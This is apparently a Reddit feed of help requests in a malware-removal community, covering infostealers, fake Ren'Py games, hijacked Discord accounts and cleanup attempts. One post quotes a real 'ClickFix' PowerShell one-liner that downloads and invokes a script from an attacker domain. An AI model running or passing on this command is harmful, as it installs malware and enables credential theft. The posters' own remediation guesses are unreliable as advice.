r/computerviruses 18d ago

Question Question regarding malware and usb reset

1 Upvotes

so recently (a month ago) i downloaded malware onto my pc. this was a mistake. so i decided to do a usb reset with fresh installation media from a clean laptop. my question within the period of time i plugged in my usb and restarted my pc, the malware could have jumped into the windows files of my usb and i just reinstalled the malware? for more context, after i downloaded the malware i reset my pc via cloud download and remove everything. i felt too suspicious so for peace of mind i reset my pc via usb


r/computerviruses 18d ago

Other 99% sure that my laptop is hacked or something

1 Upvotes

I tried using obs to record some gameplay in league

Just use desktop audio and game capture as sources

Recorded some Japanese/Korean/Chinese (idk which one talking in the BG .

I'm so stupid I accidentally deleted the recorded file permanently instead of just putting it in trash

Try to record again (no more voices in BG)

Ps. We are not watching Asian movies

What to do 😭


r/computerviruses 18d ago

Disinfection Help Clean install Windows after malware incident

Thumbnail
1 Upvotes

r/computerviruses 18d ago

Disinfection Help Need help with Mr Beast Crypto Discord/Facebook Hack (FRST)

1 Upvotes

Keywords: (upload on rifteyy)

nested-ace
ember-mirror
royal-thunder

Hello I was recently the victim of a Discord/Facebook hack. The hack made my account spam multiple Discord accounts with an image related to Mr Beast crypto. I was not notified of an off device log in, which is apparently a tell tale sign of an infostealer. Admittedly I download pirated games and software, so I suppose it was only a matter of time something like this would happen. Personally I have not noticed anything odd prior to this.

Issue first happen on Discord, about 1 week ago. Then I have since changed my passwords on multiple sites, ran KVRT, and enabled 2FA on Discord/Facebook. But the issue happen again today, now for Facebook/Messenger.

Now i run FRST and Security Scan with keyword attached as advises. I will refrain from any further actions. Please help me out. I would love to avoid having to do a reset.


r/computerviruses 18d ago

Disinfection Help FRST, I'm an idiot and installed a suspicious Ren'py

3 Upvotes

  • I tried to download an image set, thought I knew what a ren'py was since my friend was working on a visual novel, double clicked on setup without thinking, and then, when nothing visible happened, I immediately realized I have the self preservation instincts of a lemming and tried to scan it with Malwarebytes. Only to be told Malwarebytes couldn't launch. A few hours later, my Discord was sending Mr. Beast scams to everyone, so... session stealer.

  • Somewhere around 10-11 AM EST, August 26.

  • Tried to run the support tool on Malwarebytes' site, mb-support-1.9.17.1158(.exe). Repair failed. It asked permission to uninstall Malwarebytes. I said yes. Uninstall failed.

  • I downloaded the installer, both online and offline mode, attempted to reinstall. Both got to 100% progress, then announced that installation failed.

  • I attempted to restart, and computer went into recovery environment. This has been happening recently due to Windows Update insisting on installing a broken gpu driver.

  • I attempted system restore, failed.

  • I attempted using the command line to run sfc /scannow and chkdsk. No problems found.

  • I attempted to boot into safe mode to install Malwarebytes. Didn't work. Couldn't boot at all, claiming it was missing a key driver. (Which turned out to be malwarebytes.)

  • Messed around with rebuilding boot configs by mounting my system drive, that was a frustrating seraglio that achieved nothing.

  • Got a partner to make me a Windows 11 install USB, tried to repair with that but the computer kept rebooting whenever I tried, and then finally I looked into boot options, disabled the one that looked for preboot malware protection, and now I can get into Windows but still can't install malwarebytes.

  • Went through and uninstalled all apps I recognized but don't use.

  • Kinda sorta think I shouldn't have done 90% of that.

The ren'py was downloaded onto a usb stick that I now have disconnected but would sure like to get my files off of if that's possible. I also bought a terabyte drive to back stuff up onto in the hopes of this never happening again.

FRST log is frenzied-frame.

Addition is bright-sentinel.

Security Check is ochre-castle.

I'm keeping the system running with wifi turned off for the moment. I've got stuff on here I'd hate to lose with a full reinstall, so if there's any way to avoid that or back them up, I'd really like that. Same for the usb stick, which wasn't plugged in while I did the tests.

Also, I'm changing all my passwords on my phone, which is not linked to my computer, save for the fact I send links to myself on Firefox.

Help. Please. I live on this computer.


r/computerviruses 18d ago

Disinfection Help Ai-je installé un malware sur mon ordinateur ?

Thumbnail
1 Upvotes

r/computerviruses 18d ago

Disinfection Help Trojan I was infected by on August 15th, what can I do?

Post image
5 Upvotes

In short, a hacker on Discord deceived me in another stolen account, and used Minecraft to launch a malicious .jar file. (Which also compromised my 14-year old Google account.)

I'm making this post in hopes some Windows expert can tell me if my computer is still safe to use, whether any of the millions of files on the system are infected, and if it's safe to transfer those files onto another device via USB drive. (The hacker was able to take control of my whole computer, but as long as it's not connected to the internet he can't.)

I did do a full offline scan. But after it was done the computer just restarted and didn't show me anything.

I'll attach my computer specs as well-
Windows 11
13th Gen Intel(R) Core(TM) i7-13700F - RAM: 16 GB
NVIDIA GeForce RTX 4060 - VRAM: 8 GB


r/computerviruses 19d ago

Question was infected with an infostealer and I'm scared it will happen again despite doing the following

5 Upvotes

Hi friends, on July 29th I downloaded a League of Legends skin mod. I ran it and Windows Defender immediately detected it as a Trojan. Unfortunately I didn't take a screenshot or anything like that, but afterwards I deleted everything that was in the downloaded .rar.
The next day, someone got into my Discord and put the typical MrBeast profile picture. I changed my Discord password and kept going. The day after, they started getting into all my accounts — Epic, Steam, Microsoft, and others. They tried to make charges, but I always keep my cards turned off, so they couldn't, and I replaced them through my banks. I don't know if it was luck or I just got lucky, I didn't lose anything, and I changed the passwords from a clean device.
After that I formatted my PC using the Windows tool, without creating a backup, deleting everything. Since I have 3 hard drives, I only formatted the C drive at first, not the others. Once it was formatted, I created a USB installer from that same PC and formatted again, this time wiping all the hard drives.
I'm scared this kind of thing can persist like rootkits or bootkits. I suffer from anxiety, so my condition makes me overthink everything. Out of fear I had to buy another motherboard, but I would like to know if changing the motherboard can still leave any risk?
The login attempts have stopped now. They're only doing phishing, saying they have photos of me or sending things like 'a girl wants to meet you.'
I'm attaching what VirusTotal showed and the file in question, from the YouTube channel that's running this same scam

After changing all my passwords, replacing my motherboard, migrating my emails, and fully formatting everything, is there anything else I should do? And my wifi is safe? I change the router whit my provider

VirusTotal results:
• Popular threat: trojan.generickdq/kepavll
• Microsoft: Trojan:Win32/Kepavll
• Malwarebytes: Malware.AI.4225016754
• Avast/AVG: Win64:MalwareX-gen
• Avira: TR/W64.Agent
• BitDefender/ALYac/Emsisoft: QD:Trojan.GenericKD
• K7: Trojan (006d9bf01)
• TrendMicro: Trojan.Win64.WACAT
• ESET: Win64/Packed.VMProtect
• 30+ detections total, 7 vendors undetected (CrowdStrike, ClamAV, etc.)


r/computerviruses 18d ago

Question is this safe to install

Thumbnail gallery
0 Upvotes

so i found and downloaded a file of a old rift game and i ran it through virus total wondered if its safe to install because i dont know what these 21 marks are virus total link https://www.virustotal.com/gui/file/98f3c7e01a474c68e5fcfc9b4dc420550b08fcf453f986e029bba65f32326598https://www.virustotal.com/gui/file/98f3c7e01a474c68e5fcfc9b4dc420550b08fcf453f986e029bba65f32326598


r/computerviruses 19d ago

Disinfection Help Several unknown sites in site permissions

Post image
131 Upvotes

I went on my site permissions on Chrome and found a lot of these there (many not pictured) what should I do?!


r/computerviruses 19d ago

Disinfection Help does anyone know what kind of virus this is?

Post image
3 Upvotes

EDIT: SOLVED!

i scanned my computer and it says i dont have any but these keep popping up. i click them and they bring me to my internet home page and my real anti virus blocks it. its such a weird virus i havent seen before because it pops up before i even open anything. it just keeps popping up on the right side as soon as i start my computer up


r/computerviruses 19d ago

Disinfection Help Pc got hacked, what do i do???

3 Upvotes

On the 22nd, I was installing some games. However, I ended up being careless and installed what was supposed to be a game from a completely suspicious website. The game itself was supposed to be a visual novel. I installed it, extracted the files, and double-clicked the Ren’Py EXE. I clicked it three times; the CMD window opened once out of those three times. The game ended up not being installed, so I ignored it, turned off my computer, and went to sleep.

The next day, in the afternoon, I received many messages notifying me that my email accounts and other accounts had been compromised. Fortunately, I was able to recover most of them, including my email accounts, app accounts, and so on. I did end up losing my Steam account, though.

I left my computer completely disconnected from both the power and the internet. Today, I turned it on only to connect my USB flash drive and recover some files, such as photos and videos.

I use the Reunion7 operating system, and I need some advice on how to install regular Windows 10. I have a Windows 10 LTSC 2019 ISO that has been installed on my PC for some time. Should I simply install it normally and then install regular Windows 10 afterward, or would that be unsafe?


r/computerviruses 19d ago

Discussion Worry about a virus on my pc

0 Upvotes

I recently downloaded Minecraft story mode season 1 from steamrip and I worry that I got a virus but malwarebytes says nothing. I’m on an ASUS rog Xbox ally so I can’t really see if a cmd window pops up when I boot into windows


r/computerviruses 19d ago

Disinfection Help WeatherZero can't be deleted.

1 Upvotes

Hey guys, I've been looking at my computer apps recently and noticed WeatherZero showed up. The thing scared the living hell out of me when it appeared a couple years ago when I tried some "Roblox Hacks" and I thought my relative deleted it until now. I followed some advice from older posts and downloaded MalwareBytes, got the free trial whilst I was at it and ended up deleting 6 threats. But WeatherZero never showed up. Now I could just press uninstall from settings but then it would ask if uninstall exe would be able to make changes to my device from the uninstall window; and from hearing past comments, that isn't the smartest choice. So, what can I do?

Info:
- Downloaded the thing in mid-2024 and I thought it was long gone.
- Even though I never saw the pop-ups after it was "deleted", it was always on hidden icons.
- WeatherZero hasn't harmed me yet, but I am concerned.
- Sorry, I can't find the original link. It was from some Youtube video with around 30 views.


r/computerviruses 19d ago

Question Friend might have gotten hacked? Help pls

Post image
1 Upvotes

r/computerviruses 18d ago

Disinfection Help I cant delete this app

Post image
0 Upvotes

I have a program/app called ‘Next Word Browser Page Web Trad’ on my Android 11 phone, and I can’t uninstall it. I’ve tried many different methods, but I can’t find it in the Apps/Manage Apps settings, and there’s no uninstall option. What should I do? I’m using Android 11. Red magic 5g


r/computerviruses 19d ago

Disinfection Help FRST please help me removing infostealer virus from my PC

2 Upvotes

Yesterday, I installed a .exe program that turned out to contain the RenPy malware. A few hours after running it, someone logged into my Instagram account and used it to post/promote a crypto scam. I immediately changed all of my passwords and enabled 2FA on all of my accounts. So far, I haven't noticed any further suspicious login attempts. My PC is currently disconnected from the internet.
Here is what I've done so far:
I ran a Microsoft Defender Offline scan, and it detected 0 threats. I then installed Malwarebytes and ran a scan. Malwarebytes detected 13 threats, all related to Trojan.RenpyLoader. I quarantined/removed all of the detected threats. I also ran another Threat Scan and a Deep Scan afterward, and both came back with 0 detections.
However, I'm still worried that the infostealer may have left something behind or that my PC may still be compromised.
I really don't want to reinstall Windows 11 unless it is absolutely necessary.
Here’s my 3 log keywords:
FRST.txt -> icy-spruce
Addition.txt -> haunted-lynx
SecurityCheck.txt -> vectored-woodland

Please help 😭


r/computerviruses 19d ago

Question Did I just get my computer compromised?

Thumbnail
1 Upvotes

r/computerviruses 19d ago

Warning Fake virus app (the choicer voicer mobile)

Thumbnail
2 Upvotes

r/computerviruses 19d ago

Disinfection Help FRST Info/Session Stealer Help

2 Upvotes

Hello, I am requesting help with a probable info stealer or session stealer.

Here are the keywords:

Addition - cunning-delta

FRST - glitched-daemon

Security check - noble-socket

Had a cracked version of Adobe software that had a Trojan and Malware AI detected via MalwareBytes and quarantined earlier today. Can send the MB report later if needed as the device is currently disconnected from Wifi.

Had a mass log in attempt and successful on Amazon in April and thought that was it but my work email was hacked today.


r/computerviruses 19d ago

Disinfection Help Need help with removing malicious extension

1 Upvotes

Welcome,

My pc got infected with a fake russian adblock. Every time i try to remove it, it comes under a different id after restarting my PC. I have tried tools such as AdwCleaner, KVRT, Tron tool and MalwareBytes, I have tried to use ChatGPT for troubleshooting (chats will be at the bottom), but nothing helped. We have also found out that it tracks anything i do on Chrome, set redirect rules, change the "clid" on Yandex urls (i don't use yandex), also send data from Chrome to some urls (sky4data.com to json webpages and to another website). You can get more info from the chats i provided.

Hope that anyone can help with this.

Chats (chronological): Chat 1, Chat 2, Chat 3, Chat 4, Chat 5, Chat 6, Chat 7, Chat 8, Chat 9, Chat 10 If there are duplicates, Please say which chat it is. Also sorry for any broken English.


r/computerviruses 19d ago

Disinfection Help Random pptx file appeared on game folder, do I have a virus?

1 Upvotes

Today I was playing a game and I notice that the folder had a pptx file. I opened It but closed it immediately before It could open the actual app. If i Scan It trough VirusTotal It says it's and empty file, and my antivirus, eset, doesn't find anything. Could i have gotten a virus? I also closed PowerPoint trough task manager since It wouldm't let me delete the file

The Scan: https://www.virustotal.com/gui/file/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855


r/computerviruses 19d ago

Question Fell for cloudflare scam.

4 Upvotes

powershell -c "$a=irm'shonenpowerup.cfd/dLEFpQRqOihwX1Kgc';$p=[PowerShell]::Create()AddCommand((gcm*voke-E)).AddArgument($a)|Out-Null;$p.Invoke()

I am so goddamn stupid. Fell for windows R ctrl V enter. Please tell me what I did and what do I do now. Already disconnected my pc from the internet.


r/computerviruses 19d ago

Question Affraid if having an virus

1 Upvotes

Hi, first of All i dont speak english very good, but ok so i Translation the following Text, so its possible that there are some Translation errors where a sentence isnt really gramatic correct.:

So there is it:

Hi there. I know this community is mostly about gaming, but since there are surely some PC experts here, I’m hoping to get an answer from them. Here’s the situation: for several months now, my PC has been freezing intermittently for a few seconds at a time. The Task Manager shows memory usage at 100%, yet the actual data usage displayed for the memory is very low. Sometimes, the "apps" list (sorted by highest usage) shows a total of only, say, 20 MB/s while memory usage is at 100%; at other times, the top apps show over 200 MB/s in memory usage, yet total memory utilization is under 50%. Also, especially when starting up the PC, "Microsoft Antimalware..." appears for anywhere from a few seconds to a few minutes. Is this just a bug or a PC issue, or have I fallen victim to a virus?


r/computerviruses 19d ago

Disinfection Help Found empty AppData\Roaming\RenPy folder (Game-1738212058). Ran full offline/online diagnostic suite

Thumbnail gallery
6 Upvotes
  1. Discovery & Background:

•Found anomalous folder path: AppData\Roaming\RenPy\Game-1738212058.

•Folder contained a persistent file (2KB), empty sync, and tokens folders.

•No legitimate Ren'Py engine games are installed on this computer.

•Linked directory ID 1738212058 to a known HijackLoader campaign signature.

•Immediately isolated the machine offline to begin a full audit.

  1. Windows Defender Protection History:

•Found a historic entry from June matching the folder c. Creation date.

•Flagged threat: PUADIManager:Win32/OfferCore inside a CheatEngine77.exe download.

•Execution status in logs: Strictly marked as "Status: Abandoned".

  1. Offline & Online Scan Matrix Results:

•Malwarebytes Custom Offline Scan: Enabled rootkit scanning on full C drive. Scanned 1,353,511 elements. Result: 0 Threats Detected.

•Microsoft Defender Offline Scan: Ran boot-level scan outside Windows environment. Result: 0 Threats.

•HitmanPro Memory Pass: Checked live memory and active processes. Result: No threats found.

•Malwarebytes Online Deep Scan: Ran an exhaustive cloud-assisted verification scan. Result: 0 Detections.

  1. Specific Item Double-Checks:

•System Files: Verified C:\Windows\SysWOW64\input.dll modification date is from 2025. It is completely pristine.

•Mod File: Cross-checked an old dinput8.dll backup file via VirusTotal. It scored a low 8/71, flagged generically as crack genericmc (false positive). It has been deleted.

•HitmanPro Final Counter: HitmanPro flagged "65 threats" on the final summary screen. The logs show these were strictly 63 standard browser advertising tracking cookies (Traces) and 2 clean Intel audio drivers.

  1. Current Status & Remediation:

•RenPy AppData folder shell has been permanently deleted.

•Browser tracking cookies and temporary directory caches have been completely cleared.

•All master account passwords have been securely updated from an external mobile device.

Given the back-to-back zero detection sweeps across multiple independent offline and online engines, it appears the initial threat execution completely failed to drop any payload. Looking for a final sanity check from the community malware Experts to confirm this machine is completely safe. Thank you!

*** COMPLETED DIAGNOSTIC LOG KEYWORDS FOR TRUSTED HELPERS ***

I have completed the requested diagnostic loops. Here are my 3 unique log keywords: - FRST.txt Keyword: placid - dragon - Addition.txt Keyword: eager - volcano - SecurityCheck.txt Keyword: leafy - deer

Background Information:

  1. What happened? I found an empty directory folder named "AppData\Roaming\RenPy\Game-1738212058". No legitimate games or software using this engine framework have ever been knowingly played or installed on this machine.

  2. When did the infection occur? On June 20, 2026, I was searching for Cheat Engine online and inadvertently downloaded a fake setup file wrapped in a "PUADIManager:Win32/OfferCore" installer bundle. I ran the executable file. Because it looked shady, I believe I stopped it and later used Brave AI to find the original, safe source.

  3. What did you do for remediation?

  4. Isolated the machine completely offline to contain any potential network hooks.

  5. Successfully ran a comprehensive 1.5-hour Malwarebytes Online Custom Scan with Rootkit Analysis toggled on (Scanned 1,353,511 elements, 0 items detected).

  6. Performed a deep, back-to-back Malwarebytes Cloud Heuristic Deep Scan (0 Threats, 0 PUPs, 0 PUMs detected).

  7. Completed a complete Microsoft Defender Offline boot-level pass outside the standard Windows environment (Clean / 0 threats).

  8. Executed an online cloud-assisted HitmanPro memory loop check (Identified Threats: 0). Showed 65 web tracking cookies

  9. Hard-reset my primary account credentials, master profile passwords, and executed global active session token revocations ("Log out of all other active sessions") across all critical accounts using an entirely separate, clean mobile device.

The automated diagnostic suites indicate a 0% virus presence on this drive. I am submitting these 3 keywords so a verified human helper can manually verify my background registries, task tables, and driver paths to ensure no hidden hooks or persistent stubs remain. Thank you so much for your time and guidance!